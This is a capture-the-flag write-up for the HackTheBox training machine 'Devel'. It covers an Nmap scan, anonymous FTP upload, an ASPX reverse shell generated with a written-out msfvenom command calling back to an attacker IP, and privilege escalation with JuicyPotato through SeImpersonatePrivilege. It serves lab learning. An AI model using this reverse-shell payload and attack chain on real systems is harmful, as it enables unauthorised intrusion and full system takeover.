Devel

Devel is a easy level box which teach us how to properly enumerate services and exploit them.

Overview

Initial Foothold : Upload file on ftp and execute through web server

Privilege Escation : Abusing SeImpersonatePrivilege Token

Enumeration

Lets Start with port scanning

Port Scanning

# Nmap 7.80 scan initiated Wed Jun 24 01:21:34 2020 as: nmap -Pn -sS -T4 -A -p[21,80] -oN 10.10.10.5/full_script_scan 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|8.1|2012 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We got two ports open one is 21 and another 80

On port 21 anonymous login is allowed that means we can login as user "anonymous" and with any password

Lets Start with FTP

FTP Service Enumeration

Start FTP Session with username "anonymous" and any password

We got some files there are looking files related to web server

Lets confirm by visiting webpage

Yes the files we got are running on webserver

Now lets try to put files in ftp if that works then we can try to execute this files from webserver

Always try to put files on ftp server if it successed then there are more chances of exploitaiton

we created a file called hi.txt and transfer it to ftp service

Now open webserver and try to access this file

Yes we can conclude that we can upload and execute file using ftp and webserver

Summary

From enumeration we got that we can upload file on ftp and we can execute them using webserver

Exploitation

Create a aspx reverse shell payload using msfvenom 

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4445 -f aspx > shell.aspx

The above payload will create a reverse shell in aspx format

We created aspx payload because the webserver was running on Microsoft IIS

Now transfer this payload using FTP

Now create Listener for getting reverse shell

We created netcat listener

Now try to execute or access this file on webserver

Yes the file executed and we got back the reverse shell

But this reverse shell is limited we dont have all the access rights

Lets hunt for privilege escalation

Privilege Escalation

Whenever I get reverse shell using any service account, First thing I check is privilege for this service account

Lets run whoami /priv for getting all the privilege this service account has

In the above image you can observe that SetImpersonatePrivilege is enabled for this account

By abusing this token we can escalate our privileges

If you want to learn more about Abusing Token Privileges visit

LogoAbusing Token Privileges For Windows Local Privilege Escalationfoxglovesec

For Abusing this token we can use JuicyPotato.exe from github

LogoGitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub

Lets transfer this executable to windows using ftp

We will also require reverse shell for using this exploit transfer that also

Lets generate this using msfvenom and transfer this to windows victim

Now set listener

For properly working of this exploit we will require CLSID

we get this from github

LogoGitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub

Also we require system name for getting CLSID

We can get it using systeminfo cmd

Now find the CLSID from the above github link and use it in our command

we got error in first try but after changing the CLSID we successed and got back our reverse shell

Now get the root flag

We successfully exploited this box

PreviousHackTheBoxNextOptimum

Last updated

Was this helpful?